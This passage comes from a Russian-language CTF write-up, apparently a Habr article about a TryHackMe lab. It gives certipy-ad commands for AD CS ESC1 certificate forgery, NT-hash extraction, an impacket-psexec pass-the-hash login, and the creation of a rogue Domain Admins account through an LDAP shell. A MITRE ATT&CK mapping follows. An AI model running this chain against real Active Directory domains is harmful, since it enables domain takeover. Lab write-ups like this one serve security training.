\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Domain Administrator.<\/p>\n<hr\/>\n<h3>\u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u21161. \u0410\u0442\u0430\u043a\u0443\u0435\u043c AD \u0441 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0430<\/h3>\n<p>\u0417\u043d\u0430\u044f \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 ESC1, \u0434\u0430\u043b\u0435\u0435 \u044f \u043d\u0430\u0441\u0447\u0438\u0442\u0430\u043b \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c 3 \u043f\u0443\u0442\u0438 \u0440\u0435\u0448\u0435\u043d\u0438\u044f, \u0445\u043e\u0442\u044f \u043e\u043d\u0438 \u0432\u0441\u0435 \u0441\u0445\u043e\u0436\u0438.<\/p>\n<ol>\n<li>\n<p>\u041c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u043f\u0440\u0438\u0442\u0432\u043e\u0440\u0438\u0432\u0448\u0438\u0441\u044c \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c.<\/p>\n<\/li>\n<li>\n<p>\u041c\u043e\u0436\u043d\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u0442\u044c \u043f\u0440\u043e\u043f\u0443\u0441\u043a \u043d\u0430 \u0438\u043c\u044f BRADLEY_ORTIZ, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043e\u043d \u0432\u0445\u043e\u0434\u0438\u0442 \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 Domain Admins, \u0430 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u0430, \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u044d\u0442\u043e \u0443\u0441\u043b\u043e\u0432\u0438\u0435.<\/p>\n<\/li>\n<li>\n<p>\u0421\u043e\u0437\u0434\u0430\u0442\u044c \u0441\u0432\u043e\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 Domain Admins.<\/p>\n<\/li>\n<\/ol>\n<p>\u0412\u0441\u0435 3 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 ESC1.<\/p>\n<p>\u0411\u0443\u0434\u0435\u043c \u043f\u0440\u0438\u0442\u0432\u043e\u0440\u044f\u0442\u044c\u0441\u044f \u0430\u0434\u043c\u0438\u043d\u043e\u043c \u0438 \u0441\u0434\u0435\u043b\u0430\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 \u043e\u0442 \u0435\u0433\u043e \u0438\u043c\u0435\u043d\u0438. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0441\u043d\u043e\u0432\u0430 \u0431\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c certipy-ad.<\/p>\n<pre><code class=\"bash\">certipy-ad req -u 'SUSANNA_MCKNIGHT@thm.local' -p '******!' -target labyrinth.thm.local  -template 'ServerAuth' -ca 'thm-LABYRINTH-CA' -upn Administrator@thm.local<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u0430\u0439\u043b administrator.pfx, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430.<\/p>\n<p>\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0442\u043e\u0433\u043e \u0436\u0435 Certipy \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c NT-\u0445\u044d\u0448 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438\u043b\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u0442\u044c Kerberos TGT.<\/p>\n<pre><code class=\"bash\">certipy-ad auth -pfx administrator.pfx -dc-ip 10.112.146.154<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/750\/f97\/87f\/750f9787f3977dfbe7e2e662680fe7c0.png\" alt=\"\u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043f\u043e \u043f\u043e\u0434\u0434\u0435\u043e\u043b\u044c\u043d\u043e\u043c\u0443 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0443\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/750\/f97\/87f\/750f9787f3977dfbe7e2e662680fe7c0.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/750\/f97\/87f\/750f9787f3977dfbe7e2e662680fe7c0.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043f\u043e \u043f\u043e\u0434\u0434\u0435\u043e\u043b\u044c\u043d\u043e\u043c\u0443 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0443<\/figcaption><\/div>\n<\/figure>\n<p>\u041a\u0430\u043a \u0432\u0438\u0434\u043d\u043e \u0445\u044d\u0448 \u0430\u0434\u043c\u0438\u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d.<\/p>\n<p>\u041a\u043e\u0433\u0434\u0430 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0445\u044d\u0448 \u0430\u0434\u043c\u0438\u043d\u0430, \u043d\u0430\u043c \u043d\u0435 \u043d\u0443\u0436\u0435\u043d \u0435\u0433\u043e \u043f\u0430\u0440\u043e\u043b\u044c. \u041c\u044b \u043c\u043e\u0436\u0435\u043c \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f \u0441 \u0445\u044d\u0448\u0435\u043c.<\/p>\n<pre><code class=\"bash\">impacket-psexec -k -hashes :00000000000000 thm.local\/Administrator@labyrinth.thm.local<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/77e\/454\/234\/77e4542340babf16181bfd0799277170.png\" alt=\"\u0412\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/77e\/454\/234\/77e4542340babf16181bfd0799277170.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/77e\/454\/234\/77e4542340babf16181bfd0799277170.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0412\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433<\/figcaption><\/div>\n<\/figure>\n<p>\u0424\u043b\u0430\u0433 \u0440\u0443\u0442\u0430 \u0432\u0437\u044f\u0442.<\/p>\n<pre><code>THM{root's_flag_is_here}<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h3>\u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u21162 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u0432\u043e\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f<\/h3>\n<p>\u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u0430\u043f\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430, \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0443 \u043c\u0435\u043d\u044f kerberos \u0432\u044b\u0434\u0430\u0432\u0430\u043b \u043e\u0448\u0438\u0431\u043a\u0443.<\/p>\n<pre><code class=\"bash\">[*] Trying to get TGT...[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041e\u0448\u0438\u0431\u043a\u0430 KDC_ERR_PADATA_TYPE_NOSUPP \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u043d\u0430 DC \u0431\u0430\u043d\u0430\u043b\u044c\u043d\u043e \u043d\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d (\u0438\u043b\u0438 \u0441\u043b\u043e\u043c\u0430\u043d) \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0434\u043b\u044f Kerberos PKINIT-\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u041e\u0434\u043d\u0430\u043a\u043e \u0432\u0430\u043b\u0438\u0434\u043d\u044b\u0439 \u0444\u0430\u0439\u043b .pfx \u044f \u0443\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b.<\/p>\n<p>\u0413\u0443\u0433\u043b\u0438\u043d\u0433 \u0434\u0430\u043b \u043e\u0434\u043d\u0443 \u043d\u0430\u0432\u043e\u0434\u043a\u0443, \u0447\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043e\u0431\u043e\u0439\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 Schannel \u2014 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0432 LDAP \u043f\u043e TLS-\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0443, \u043c\u0438\u043d\u0443\u044f Kerberos \u0446\u0435\u043b\u0438\u043a\u043e\u043c.<\/p>\n<pre><code class=\"bash\">certipy-ad auth -pfx administrator.pfx -dc-ip 10.114.161.221 -ldap-shell<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0448\u0435\u043b\u043b, \u043e\u0434\u043d\u0430\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u0433\u043e \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043d\u0435\u043b\u044c\u0437\u044f \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u043b\u0430\u0433. \u041d\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043d\u043e\u0432\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0432\u044b\u0434\u0430\u0442\u044c \u0435\u043c\u0443 \u0430\u0434\u043c\u0438\u043d\u0441\u043a\u0438\u0435 \u043f\u0440\u0430\u0432\u0430.<\/p>\n<pre><code class=\"bash\"># add_user DenAttempting to create user in: %s CN=Users,DC=thm,DC=localAdding new user with username: Den and password: 40B2lsU\/56CP7,6 result: OK# add_user_to_group Den \"Domain Admins\"Adding user: Den to group Domain Admins result: OK<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0421 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c\u0438 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u043b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u043f\u043e RDP, \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u0444\u043b\u0430\u0433.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2ce\/46b\/7f7\/2ce46b7f7655f9fe7fa8afa026d56b41.png\" alt=\"\u0424\u043b\u0430\u0433 \u0440\u0443\u0442\u0430 \u043f\u043e RDP\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/2ce\/46b\/7f7\/2ce46b7f7655f9fe7fa8afa026d56b41.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2ce\/46b\/7f7\/2ce46b7f7655f9fe7fa8afa026d56b41.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0424\u043b\u0430\u0433 \u0440\u0443\u0442\u0430 \u043f\u043e RDP<\/figcaption><\/div>\n<\/figure>\n<hr\/>\n<h3>\u041f\u0430\u0440\u0443 \u0437\u0430\u043c\u0435\u0442\u043e\u043a \u043f\u043e \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044e.<\/h3>\n<p>\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0443\u0442\u0438\u043b\u0438\u0442\u044b certipy-ad \u0438\u043d\u043e\u0433\u0434\u0430 \u0441\u044b\u043f\u0430\u043b\u0438\u0441\u044c \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438, \u043f\u043e \u0442\u0438\u043f\u0443<\/p>\n<pre><code class=\"bash\">[!] DNS resolution failed: The DNS query name does not exist: labyrinth.thm.local.Traceback (most recent call last):  File \"\/usr\/lib\/python3\/dist-packages\/certipy\/lib\/[target.py](http:\/\/target.py)\", line 442, in resolve<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u042d\u0442\u043e \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Certipy \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 dns.resolver \u0438\u0437 Python, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u043e\u0434\u0438\u0442 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0432 DNS-\u0441\u0435\u0440\u0432\u0435\u0440 \u0438\u0437 \/etc\/resolv.conf, \u0430 \u043d\u0435 \u0432 \/etc\/hosts. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0443\u0436\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0430\u0439\u043f\u0438\u0448\u043d\u0438\u043a \u043c\u0430\u0448\u0438\u043d\u044b \u0432 \u044d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u043f\u0435\u0440\u0432\u044b\u043c. \u041f\u043e\u0440\u044f\u0434\u043e\u043a \u0437\u0434\u0435\u0441\u044c \u0432\u0430\u0436\u0435\u043d!<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043c\u0430\u0448\u0438\u043d\u044b \u0443\u0437\u043d\u0430\u043b \u043f\u0440\u043e \u0443\u0442\u0438\u043b\u0438\u0442\u0443 rpcclient. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0442\u0430\u0441\u043a\u0435 \u043f\u0440\u0438 \u043c\u043e\u0435\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u0438, \u043e\u043d\u0430 \u043d\u0435 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u043b\u0430\u0441\u044c, \u043e\u0434\u043d\u0430\u043a\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u0430 \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043d\u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043c\u0430\u0441\u0441\u0443 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043e\u0442\u0434\u0430\u044e\u0442 \u0434\u0440\u0443\u0433\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b. \u0420\u0430\u0431\u043e\u0442\u0430\u044f \u0441 AD \u043d\u0435\u0440\u0435\u0434\u043a\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f SID (Security Identifier) \u2014 \u044d\u0442\u043e \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, S-1-5-21-3623811015-3361044348-30300820-500), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 Windows \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u043b\u044f \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u0423\u0437\u043d\u0430\u0442\u044c SID \u0430\u0434\u043c\u0438\u043d\u0430 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043c\u043e\u0436\u043d\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b:<\/p>\n<pre><code class=\"bash\">rpcclient -U 'SUSANNA_MCKNIGHT%PASSWORD' 10.112.146.154 -c \"lookupnames Administrator\"<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0415\u0441\u043b\u0438 \u043d\u0430 DC \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u043f\u0430\u0442\u0447 KB5014754, \u0442\u043e \u043f\u0440\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 certipy-ad auth \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u043b\u0435\u0442\u0435\u0442\u044c \u043e\u0442\u043a\u0430\u0437. \u0412 \u044d\u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u044c SID \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u0443\u043a\u0430\u0437\u0430\u0442\u044c \u0435\u0433\u043e \u043f\u0440\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.<\/p>\n<hr\/>\n<h3>\u041c\u0430\u043f\u043f\u0438\u043d\u0433 \u043f\u043e MITRE ATT&amp;CK<\/h3>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<th>\n<p align=\"left\">Phase<\/p>\n<\/th>\n<th>\n<p align=\"left\">Tactic<\/p>\n<\/th>\n<th>\n<p align=\"left\">Technique<\/p>\n<\/th>\n<th>\n<p align=\"left\">ID<\/p>\n<\/th>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u043e\u0432<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0007\/\" rel=\"noopener noreferrer nofollow\">Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1046\/\" rel=\"noopener noreferrer nofollow\">Network Service Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1046<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u0413\u043e\u0441\u0442\u0435\u0432\u043e\u0439 SMB \u0434\u043e\u0441\u0442\u0443\u043f<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0007\/\" rel=\"noopener noreferrer nofollow\">Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1087\/002\/\" rel=\"noopener noreferrer nofollow\">Account Discovery: Domain Account<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1087.002<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u041f\u0430\u0440\u043e\u043b\u0438 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0006\/\" rel=\"noopener noreferrer nofollow\">Credential Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1552\/001\/\" rel=\"noopener noreferrer nofollow\">Unsecured Credentials: Credentials In Files<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1552.001<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u0412\u0445\u043e\u0434 \u043f\u043e RDP \u0447\u0435\u0440\u0435\u0437 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0435 \u043a\u0440\u0435\u0434\u044b<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0001\/\" rel=\"noopener noreferrer nofollow\">Initial Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1078\/002\/\" rel=\"noopener noreferrer nofollow\">Valid Accounts: Domain Accounts<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1078.002<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u041c\u0430\u043f\u043f\u0438\u043d\u0433 \u0434\u043e\u043c\u0435\u043d\u0430 \u0447\u0435\u0440\u0435\u0437 BloodHound<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0007\/\" rel=\"noopener noreferrer nofollow\">Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1069\/002\/\" rel=\"noopener noreferrer nofollow\">Permission Groups Discovery: Domain Groups<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1069.002<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">AD CS ESC1 \u043f\u043e\u0434\u0434\u0435\u043b\u043a\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0006\/\" rel=\"noopener noreferrer nofollow\">Credential Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1649\/\" rel=\"noopener noreferrer nofollow\">Steal or Forge Authentication Certificates<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1649<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u0418\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0435 NT-\u0445\u0435\u0448\u0430 \u0438\u0437 PFX<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0006\/\" rel=\"noopener noreferrer nofollow\">Credential Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/\" rel=\"noopener noreferrer nofollow\">OS Credential Dumping<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1003<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Pass-the-Hash \u0447\u0435\u0440\u0435\u0437 psexec<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0008\/\" rel=\"noopener noreferrer nofollow\">Lateral Movement<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1550\/002\/\" rel=\"noopener noreferrer nofollow\">Use Alternate Authentication Material: Pass the Hash<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1550.002<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 Domain Admins<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0003\/\" rel=\"noopener noreferrer nofollow\">Persistence<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1136\/002\/\" rel=\"noopener noreferrer nofollow\">Create Account: Domain Account<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1136.002<\/code><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<h3>\u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e CVSS<\/h3>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<th>\n<p align=\"left\">CVE<\/p>\n<\/th>\n<th>\n<p align=\"left\">CVSS 3.1<\/p>\n<\/th>\n<th>\n<p 